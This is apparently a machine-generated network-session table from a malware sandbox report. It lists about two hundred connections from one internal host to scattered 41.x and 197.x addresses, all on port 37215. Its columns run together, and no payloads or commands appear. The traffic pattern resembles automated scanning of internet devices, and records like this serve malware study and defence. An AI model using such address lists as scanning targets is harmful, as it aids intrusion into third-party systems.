                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4091192.168.2.155823641.94.174.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4092192.168.2.153522241.192.197.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4093192.168.2.155536441.78.15.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4094192.168.2.154999241.83.216.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4095192.168.2.154291641.220.47.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4096192.168.2.153488041.139.189.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4097192.168.2.153648441.200.185.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4098192.168.2.154353041.111.200.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4099192.168.2.154838841.206.25.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4100192.168.2.154344641.242.13.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4101192.168.2.155699041.178.120.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4102192.168.2.154329241.121.126.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4103192.168.2.153590841.38.251.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4104192.168.2.154197241.90.148.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4105192.168.2.155054641.216.132.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4106192.168.2.154695041.13.191.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4107192.168.2.154634841.122.10.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4108192.168.2.154029641.136.72.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4109192.168.2.154964241.94.22.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4110192.168.2.153885441.139.122.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4111192.168.2.155136841.129.11.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4112192.168.2.153708041.195.208.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4113192.168.2.154102841.43.8.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4114192.168.2.154066041.41.228.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4115192.168.2.155279641.224.144.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4116192.168.2.154265641.200.9.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4117192.168.2.154747641.77.74.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4118192.168.2.155387441.59.109.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4119192.168.2.154843041.195.35.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4120192.168.2.155571441.160.38.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4121192.168.2.154456641.194.28.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4122192.168.2.153657441.21.235.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4123192.168.2.153703241.172.167.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4124192.168.2.155714441.127.11.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4125192.168.2.155867241.140.156.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4126192.168.2.154488841.236.154.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4127192.168.2.154579841.90.62.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4128192.168.2.153783641.60.39.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4129192.168.2.154757641.11.129.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4130192.168.2.154203841.142.104.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4131192.168.2.155511241.215.195.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4132192.168.2.155382041.252.189.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4133192.168.2.154430641.107.78.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4134192.168.2.155774241.63.44.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4135192.168.2.154950041.240.103.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4136192.168.2.153930241.76.145.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4137192.168.2.155408041.102.11.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4138192.168.2.154708041.78.242.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4139192.168.2.154250641.209.189.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4140192.168.2.155109041.185.190.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4141192.168.2.154637841.100.39.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4142192.168.2.155561041.107.69.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4143192.168.2.154039641.59.14.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4144192.168.2.155433441.2.64.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4145192.168.2.155680441.56.129.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4146192.168.2.153585641.41.203.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4147192.168.2.153620241.160.34.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4148192.168.2.155047641.197.123.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4149192.168.2.156085241.6.234.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4150192.168.2.155356841.237.152.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4151192.168.2.154600641.28.73.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4152192.168.2.155302241.144.220.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4153192.168.2.155357841.182.2.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4154192.168.2.154124241.46.154.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4155192.168.2.153950641.166.158.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4156192.168.2.155909841.99.111.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4157192.168.2.155789241.130.130.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4158192.168.2.155773041.101.184.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4159192.168.2.155120641.58.212.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4160192.168.2.155238641.5.14.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4161192.168.2.155352841.134.101.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4162192.168.2.153418041.181.63.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4163192.168.2.155524041.186.215.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4164192.168.2.153497041.83.69.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4165192.168.2.153415041.157.163.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4166192.168.2.155698041.105.57.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4167192.168.2.154811241.94.184.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4168192.168.2.154913441.217.240.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4169192.168.2.156022641.226.198.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4170192.168.2.155694841.94.187.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4171192.168.2.154386441.139.52.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4172192.168.2.154038441.33.37.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4173192.168.2.153526841.64.244.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4174192.168.2.155798041.101.57.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4175192.168.2.153381241.156.53.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4176192.168.2.155146841.73.163.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4177192.168.2.155233041.245.150.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4178192.168.2.154916441.54.246.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4179192.168.2.155101441.40.3.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4180192.168.2.155354641.153.139.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4181192.168.2.153619841.159.85.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4182192.168.2.154929641.58.231.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4183192.168.2.155549441.154.53.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4184192.168.2.154786041.172.207.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4185192.168.2.154812241.191.197.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4186192.168.2.154331841.55.10.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4187192.168.2.154634641.104.25.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4188192.168.2.154499241.239.194.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4189192.168.2.155988041.51.42.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4190192.168.2.155019441.37.182.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4191192.168.2.154788041.112.110.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4192192.168.2.155885241.246.98.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4193192.168.2.154207641.27.251.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4194192.168.2.154811641.125.177.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4195192.168.2.155349441.2.125.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4196192.168.2.155597641.183.47.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4197192.168.2.154771641.68.52.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4198192.168.2.155484241.234.142.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4199192.168.2.155010041.170.254.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4200192.168.2.155589841.171.52.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4201192.168.2.154988041.162.109.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4202192.168.2.155289641.31.56.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4203192.168.2.155386441.93.16.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4204192.168.2.154522641.13.80.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4205192.168.2.155886241.62.239.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4206192.168.2.155714841.59.229.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4207192.168.2.153887241.16.43.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4208192.168.2.155235441.120.201.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4209192.168.2.154877641.6.227.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4210192.168.2.155136841.137.33.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4211192.168.2.153656241.34.173.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4212192.168.2.154323841.15.123.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4213192.168.2.155677641.236.58.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4214192.168.2.154995641.45.27.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4215192.168.2.154863041.160.59.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4216192.168.2.155302241.233.99.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4217192.168.2.153769041.246.240.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4218192.168.2.154241241.204.7.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4219192.168.2.155206441.151.173.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4220192.168.2.154780641.122.102.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4221192.168.2.155150441.165.120.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4222192.168.2.154597841.38.214.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4223192.168.2.153613041.129.2.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4224192.168.2.154565441.34.17.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4225192.168.2.154538841.44.14.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4226192.168.2.153425241.78.227.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4227192.168.2.153602041.142.254.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4228192.168.2.154872041.55.2.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4229192.168.2.153969641.213.94.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4230192.168.2.1542214197.150.160.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4231192.168.2.1543768197.130.108.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4232192.168.2.1548572197.102.166.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4233192.168.2.1547506197.186.122.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4234192.168.2.1543528197.196.85.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4235192.168.2.1539588197.188.70.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4236192.168.2.1553908197.63.1.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4237192.168.2.1554896197.157.180.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4238192.168.2.1545090197.201.168.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4239192.168.2.1557764197.248.63.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4240192.168.2.1535824197.173.217.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4241192.168.2.1551986197.130.61.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4242192.168.2.1557336197.29.16.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4243192.168.2.1538628197.138.91.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4244192.168.2.1549796197.252.0.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4245192.168.2.1546866197.1.108.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4246192.168.2.1555934197.248.8.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4247192.168.2.1534176197.24.114.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4248192.168.2.1557782197.67.230.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4249192.168.2.1539756197.142.163.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4250192.168.2.1535972197.93.115.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4251192.168.2.1533402197.110.190.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4252192.168.2.1553896197.168.167.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4253192.168.2.1547784197.190.249.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4254192.168.2.1550936197.2.205.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4255192.168.2.1537288197.158.96.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4256192.168.2.1538446197.66.166.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4257192.168.2.1532990197.207.146.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4258192.168.2.1555394197.187.48.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4259192.168.2.1558512197.134.64.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4260192.168.2.1557848197.121.59.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4261192.168.2.1550500197.61.15.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4262192.168.2.1548612197.98.106.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4263192.168.2.1539872197.246.127.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4264192.168.2.1542876197.240.29.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4265192.168.2.1542204197.121.96.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4266192.168.2.1547640197.21.86.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4267192.168.2.1540930197.231.123.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4268192.168.2.1559422197.138.115.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4269192.168.2.1537640197.132.39.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4270192.168.2.1537862197.96.67.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4271192.168.2.1547942197.29.26.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4272192.168.2.1534754197.103.235.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4273192.168.2.1551488197.10.239.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4274192.168.2.1534604197.53.91.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4275192.168.2.1541090197.147.200.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4276192.168.2.1540574197.25.157.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4277192.168.2.1537926197.87.242.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4278192.168.2.1560366197.247.206.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4279192.168.2.1537270197.228.199.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4280192.168.2.1543634197.112.166.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4281192.168.2.1554280197.202.235.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4282192.168.2.1536446197.235.46.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4283192.168.2.1553928197.75.65.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4284192.168.2.1555954197.149.178.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4285192.168.2.1542656197.180.87.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4286192.168.2.1541190197.62.11.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4287192.168.2.1547352197.74.188.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4288192.168.2.1556112197.179.151.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4289192.168.2.1541964197.190.179.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4290192.168.2.1552468197.125.140.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4291192.168.2.1545762197.242.86.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
